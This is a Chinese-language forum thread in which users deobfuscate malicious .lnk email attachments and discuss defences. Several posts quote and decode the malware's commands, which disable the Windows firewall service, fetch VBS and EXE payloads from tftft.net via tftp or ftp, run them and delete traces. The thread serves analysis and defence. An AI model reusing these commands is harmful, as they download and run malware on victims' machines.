| 發表者 |
討論內容 |
| larry |
發表時間:2009-11-14 01:29 |
- 三段會員
- 註冊日: 2007-04-05
- 來自:
- 發表數: 129
|
- lnk 類型病毒動作模式研究與請益
- 之前一直沒時間細看目前的 lnk 病毒是在做啥,今天又收到一封「best wishes」的夾檔,就發想研究一下吧...
lnk 的內容如下:
引文:rem %CoMsPEC% /C ecHo %M%%X%%M%P%A%%m%%x%%m%%X%%m%.NE%M%%a%gE%m%%A%%M%%a%F.Vbs>O.BAT&echo S%M%AR%M%%a%f.vBS>>o.BaT&SEt M=t&sEt x=f&SEt a= &O.bAT
為了容易辨識,我全改小寫:
引文:rem %comspec% /c echo %m%%x%%m%p%a%%m%%x%%m%%x%%m%.ne%m%%a%ge%m%%a%%m%%a%f.vbs>o.bat&echo s%m%ar%m%%a%f.vbs>>o.bat&set m=t&set x=f&set a= &o.bat
才疏學淺的小弟只能解譯出這樣:
引文:rem cmd /c echo %m% %x% %m% p %a% %m% %x% %m% %x% %m% .ne %m% %a% ge %m% %a% %m% %a% f.vbs>o.bat&echo s %m% ar %m% %a% f.vbs>>0.bat&set m=t&set x=f&set a= &o.bat
它是在製作可執行的VBS轉成bat指令吧?然後叫 cmd 去執行,但是實在看不出它如何做...這點,就請先進指導了...
(我沒勇氣找別的電腦執行...然後看結果...)
(指令行最前之 rem 是自己加上)
----------------
--- 回答提供參考,發問虛心求教 ---
|
|
|
| s793016 |
發表時間:2009-11-14 08:14 |
- 二段會員
- 註冊日: 2006-09-22
- 來自:
- 發表數: 63
|
- Re: lnk 類型病毒動作模式研究與請益
- 您解譯得差不多了丫,您把 set = 的東西再分行,然後把環境變數代換進去原字串,就看得出來他幹了什麼壞事了
解出來就是這樣:
%CoMsPEC% /C ecHo tftP tftft.NEt gEt t F.Vbs>O.BAT
echo StARt f.vBS>>o.BaT
o.bat
所以 o.bat 的內容就會是這樣:
tftP tftft.NEt gEt t F.Vbs
StARt f.vBS
抓下來的 F.VBs 內容:
sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k
array 內的東西應該就是機器碼了
----------------
|
|
|
| Luckey |
發表時間:2009-11-14 23:33 |
- 初心者
- 註冊日: 2009-03-21
- 來自:
- 發表數: 19
|
- Re: lnk 類型病毒動作模式研究與請益
- 之前有看到某網站解說,這類型病毒是利用系統內建的 TFTP程式
Trivial File Transfer Protocol(簡單文件傳輸協議)作背景自動傳輸,因為是內建程式,所以防毒軟體不會有反應
而tftp.exe又是系統保護檔案,無法直接刪除
最簡單的應對方式是把TFTP使用的 Port 69 關閉,就可以阻止
(或者是利用權限設定來禁用tftp.exe)
因為不是這方面專長,不敢實際測試....
|
|
|
| larry |
發表時間:2009-11-16 22:38 |
- 三段會員
- 註冊日: 2007-04-05
- 來自:
- 發表數: 129
|
- Re: lnk 類型病毒動作模式研究與請益
- 引文:
s793016 寫道:
您解譯得差不多了丫,您把 set = 的東西再分行,然後把環境變數代換進去原字串,就看得出來他幹了什麼壞事了
~恕省略~
是啊~~做的真是滿隱密的,像我這種二流系統研究的人,就在一時之間看不出所以然....
環境變數代入字串..嗯~真是用大小寫及空白或是錯亂位置來擾亂視聽。不過您還真的執行了他的動作,他會抓檔下來後再搞怪,這就是目的了。
又根據 Luckey 所提,找到相關少用的「指令用執行檔」,把它給封了,也是不錯的抵制方法!
我是從不當「直接」好奇寶寶(enter&Double Click),從前拆解過自動解壓縮用圖檔做幌子的病毒檔,就覺得很有趣,現在做病毒的已經更上一層了, enduser 更要注意小心了~
----------------
--- 回答提供參考,發問虛心求教 ---
|
|
|
| threesecond |
發表時間:2009-12-03 22:38 |
- 網站管理員
- 註冊日: 2003-11-05
- 來自:
- 發表數: 3167
|
- Re: lnk 類型病毒動作模式研究與請益
- 簡單的作法:
如果你有自己管轄權的防火牆或 Mail Sserver,
Mail Server 可以直接禁止夾帶 .lnk 附檔,
防火牆可以用 URL Filter 去過濾 .lnk,
另外在防火牆上過濾 ftp// 協定下載 .vbs,
這樣就能防止大部分此類病毒了。
正常來說沒有人會把「捷徑」放在網路上下載,
所以擋掉這類型的檔案,幾乎不太會造成誤判。
----------------
不要叫我大大,我今天大過了。
|
|
|
| 金牛347 |
發表時間:2010-01-24 08:40 |
- 初心者
- 註冊日: 2009-09-24
- 來自:
- 發表數: 12
|
- Re: lnk 類型病毒動作模式研究與請益
- 引文:
s793016 寫道:
抓下來的 F.VBs 內容:
sub k
for i=1 to UBound(s)
r=r&chr(s(i)-823)
next
Set kk = CreateObject("Wscript.Shell")
kk.run r,0
end sub
s=array(836,922 ... 中略 ... 942,870)
k
array 內的東西應該就是機器碼了
=========================================
不是機器碼,是繞碼;
其內容如下
引文:
cmd /c net stop sharedaccess&echo o tftft.net>n.txt&echo 11>>n.txt&echo recv d d.exe>>n.txt&echo bye>>n.txt&ftp -s:n.txt&d.exe&attrib ?.vbs -r&del ? ?.exe ?.vbs ?.bat ??.bat&start http://buy.yahoo.com.tw
|
|
|
| McEvoy |
發表時間:2010-06-12 08:22 |
- 初心者
- 註冊日: 2010-06-12
- 來自:
- 發表數: 1
|
- Re: lnk 類型病毒動作模式研究與請益
- 對不起,借個標題請教一下
小弟的女友收到了不明的lnk郵件,還不小心點擊執行了
因為我實在看不懂lnk裡面的內容
可否請教一下這段連結到底做了什麼?
執行之後,又要怎樣補救避免造成傷害?
謝謝
引文:%cOmspEc% /c SET Y= GET &eCho tftP tf%W%ET%y%T C%s%BS>rt.BAt&ECHO StaRt c%s%Bs>>rt.BaT&sEt S=.v&Set W=tFT.n&RT.Bat
|
|
|
| Sdany |
發表時間:2010-06-14 18:05 |
- 九段會員
- 註冊日: 2006-09-07
- 來自:
- 發表數: 269
|
- Re: lnk 類型病毒動作模式研究與請益
- 把那些 %xxx% 用 set xxx 的變數套進去後
可以得知
使用 tftp (系統內鍵) 下載某網站上的 c.vbs
再執行 c.vbs
該 c.vbs 是什麼內容就不知道了 = =
----------------
1. KL Key Check
2. 看網路電視、聽廣播
3. My Blog
|
|
|
